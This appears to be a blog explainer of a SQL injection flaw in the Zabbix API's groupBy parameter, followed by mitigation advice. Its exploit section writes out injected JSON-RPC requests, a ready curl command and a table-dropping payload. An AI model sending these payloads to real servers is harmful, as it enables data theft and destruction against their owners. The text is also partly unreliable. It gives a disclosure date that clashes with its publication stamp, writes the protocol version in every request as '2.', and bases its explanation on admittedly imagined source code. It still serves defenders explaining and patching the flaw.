In June 2024, a severe security vulnerability—CVE-2024-36465—was publicly disclosed for Zabbix, a popular open-source monitoring tool used to track the status of servers and network hardware. This vulnerability allows any regular Zabbix user with API access to execute arbitrary SQL commands on the backend database, potentially compromising all data stored by Zabbix.
What is CVE-2024-36465?
CVE-2024-36465 is an SQL Injection vulnerability present in Zabbix servers, specifically in the file:
include/classes/api/CApiService.php.
The flaw resides in how the software handles user-provided input for the groupBy parameter. Without proper sanitization or validation, attackers can inject malicious SQL statements and alter the query logic, which can lead to data theft, data modification, or even total compromise of the server.
Affected Versions: Zabbix 6.x and possibly some earlier, unpatched versions.
- Zabbix official advisory: Zabbix Security Advisory ZBX-24464
- NVD entry: CVE-2024-36465
How Does the Vulnerability Work?
The vulnerable parameter is groupBy when used in specific API calls. Zabbix developers failed to properly sanitize values passed to groupBy, directly including them in SQL statements.
Inside CApiService.php, somewhere in request processing, we can imagine code like
// PSEUDOCODE!
$groupBy = $_REQUEST['groupBy'];
$sql = "SELECT * FROM monitored_objects GROUP BY $groupBy";
$db->query($sql);
If groupBy is 'status, hostid' that’s fine.
If it’s status; DROP TABLE users;--, that’s a disaster.
Example Exploit: How a Regular User Can Inject SQL
Assume you are a standard user with API access (for automation, dashboards, etc.).
When making an API request to Zabbix, you normally POST JSON like this
{
"jsonrpc": "2.",
"method": "problem.get",
"params": {
"groupBy": "eventid"
},
"auth": "your_api_token",
"id": 1
}
Now, inject SQL like this
{
"jsonrpc": "2.",
"method": "problem.get",
"params": {
"groupBy": "eventid; SELECT version()--"
},
"auth": "your_api_token",
"id": 2
}
This might result in Zabbix executing
SELECT ... FROM ... GROUP BY eventid; SELECT version()--"
With curl
curl -X POST \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.",
"method": "problem.get",
"params": {
"groupBy": "eventid; SELECT version()--"
},
"auth": "your_api_token",
"id": 2
}' \
http://<your.zabbix.url>/zabbix/api_jsonrpc.php
Possible server errors—sometimes error output reveals data!
- If you try groupBy: eventid; DROP TABLE users;-- you could delete key tables (WARNING: This is destructive. Don't do this on production!)
Mitigation Steps
1. Update Zabbix Immediately
Zabbix 6.x+ are patched in the latest releases. Download updates from:
https://www.zabbix.com/download
2. Restrict API Access
Only allow API access to trusted users. Limit network exposure of API endpoints.
3. Input Monitoring
If you have a WAF or intrusion detection system, block or alert on unexpected semicolons or SQL keywords in API input.
4. Review Permissions
Audit all Zabbix users with API access—disable accounts you don’t need.
Conclusion
CVE-2024-36465 is a dramatic example of how one oversight in input validation can allow a regular Zabbix user to wreak havoc on your monitoring environment. The vulnerability is easy to exploit, requiring no special privileges or hard-to-obtain credentials. If you run Zabbix and expose its API, you must update now!
Links & Further Reading
- Zabbix Official Security Advisory (ZBX-24464)
- CVE-2024-36465 at NVD
- Zabbix Downloads (for patch)
- OWASP SQL Injection Cheat Sheet
Timeline
Published on: 04/02/2025 06:15:34 UTC
Last modified on: 04/02/2025 14:58:07 UTC